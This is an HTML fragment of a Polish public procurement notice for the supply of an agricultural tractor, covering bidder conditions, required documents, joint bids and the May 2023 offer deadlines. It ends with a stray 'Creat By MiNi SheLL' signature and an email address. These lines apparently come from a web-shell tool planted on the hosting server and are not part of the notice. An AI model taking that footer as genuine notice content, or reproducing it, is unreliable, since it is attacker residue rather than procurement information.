określa następujące warunki udziału w postępowaniu:<br/><br/>Lp.	Warunki udziału w postępowaniu<br/>1	Zdolność techniczna lub zawodowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. <br/>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zamówienia, wykonał minimum 2 zadania polegające na dostawie ciągnika rolniczego o podanych lub przybliżonych parametrach.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.1.	Wykonawca wraz z ofertą zobowiązany jest złożyć:<br/>Załączniki składane z ofertą : <br/>Załącznik nr 2 – formularz ofertowy. <br/>Załącznik nr 3 – oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania. <br/>Załącznik nr 3a – oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania. <br/>Załącznik nr 4 – oświadczenie Wykonawcy dotyczące spełniania warunków udziału w postępowaniu. <br/>Załącznik nr 5 – oświadczenie podmiotu udostępniającego zasoby (jeżeli ma zastosowanie). <br/>Załącznik nr 5a – oświadczenie podmiotu udostępniającego zasoby (jeżeli ma zastosowanie).<br/><br/>9.2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/><br/>ZAŁĄCZNIK NR 6 – WYKAZ WYKONANYCH DOSTAW - DOŚWIADCZENIE. <br/>ZAŁĄCZNIK NR 7 – OŚWIADCZENIE AKTUALIZUJĄCE BRAK PODSTAW WYKLUCZENIA (GRUPA KAPITAŁOWA).<br/><br/>9.3.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania, wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>9.4.	Jeżeli zajdą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>9.5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>9.6.	Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia Wykonawca składa, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>9.7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1.	Wykonawca wraz z ofertą zobowiązany jest złożyć:<br/>Załączniki składane z ofertą : <br/>Załącznik nr 2 – formularz ofertowy. <br/>Załącznik nr 3 – oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania. <br/>Załącznik nr 3a – oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania. <br/>Załącznik nr 4 – oświadczenie Wykonawcy dotyczące spełniania warunków udziału w postępowaniu. <br/>Załącznik nr 5 – oświadczenie podmiotu udostępniającego zasoby (jeżeli ma zastosowanie). <br/>Załącznik nr 5a – oświadczenie podmiotu udostępniającego zasoby (jeżeli ma zastosowanie).<br/><br/>9.2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/><br/>ZAŁĄCZNIK NR 6 – WYKAZ WYKONANYCH DOSTAW - DOŚWIADCZENIE. <br/>ZAŁĄCZNIK NR 7 – OŚWIADCZENIE AKTUALIZUJĄCE BRAK PODSTAW WYKLUCZENIA (GRUPA KAPITAŁOWA).<br/><br/>9.3.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania, wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>9.4.	Jeżeli zajdą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>9.5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>9.6.	Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia Wykonawca składa, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>9.7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 10.1.	Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących, przedmiotowych środków dowodowych:<br/>Lp.	Wymagany dokument<br/>1	zestawienie oferowanego sprzętu zawierające następujące dane: nazwę producenta, model, a także wykaz parametrów technicznych i cech funkcjonalnych oferowanego sprzętu pozwalające określić, czy oferowane urządzenia spełniają wymogi określone w SWZ<br/><br/>2	karty katalogowe /karty techniczne lub inne środki dowodowe (np. foldery oferowanych produktów, prospekty, katalogi, karty charakterystyki artykułów) oferowanych urządzeń producenta lub autoryzowanego przedstawiciela producenta potwierdzające zgodność deklarowanych parametrów technicznych i funkcjonalnych<br/><br/>3	CERTYFIKATY ISO i deklaracje zgodności CE lub równoważne – zgodnie z opisem przedmiotu zamówienia stanowiącego Załącznik nr 1 do SWZ<br/><br/>10.2.	Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzą, że oferowane dostawy, usługi lub roboty budowlane spełniają określone przez Zamawiającego wymagania, cechy lub kryteria.<br/>10.3.	Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 10.1.	Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących, przedmiotowych środków dowodowych:<br/>Lp.	Wymagany dokument<br/>1	zestawienie oferowanego sprzętu zawierające następujące dane: nazwę producenta, model, a także wykaz parametrów technicznych i cech funkcjonalnych oferowanego sprzętu pozwalające określić, czy oferowane urządzenia spełniają wymogi określone w SWZ<br/><br/>2	karty katalogowe /karty techniczne lub inne środki dowodowe (np. foldery oferowanych produktów, prospekty, katalogi, karty charakterystyki artykułów) oferowanych urządzeń producenta lub autoryzowanego przedstawiciela producenta potwierdzające zgodność deklarowanych parametrów technicznych i funkcjonalnych<br/><br/>3	CERTYFIKATY ISO i deklaracje zgodności CE lub równoważne – zgodnie z opisem przedmiotu zamówienia stanowiącego Załącznik nr 1 do SWZ<br/><br/>10.2.	Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzą, że oferowane dostawy, usługi lub roboty budowlane spełniają określone przez Zamawiającego wymagania, cechy lub kryteria.<br/>10.3.	Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 13.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>13.2.	Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>13.3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>13.4.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane (ar. 117 ust. 2 Pzp).<br/>13.5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. Zatem ten spośród wykonawców, który posiada zdolności do realizacji zamówienia, tj. spełnia warunki udziału w postępowaniu, powinien zrealizować zamówienie w zakresie, do wykonania którego niezbędne są te zdolności.<br/>13.6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, składane na podstawie art. 117 ust. 4 ustawy Pzp, z którego musi jednoznacznie wynikać, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian zawarto w § 8 wzoru umowy stanowiącego<br/>załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-26 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com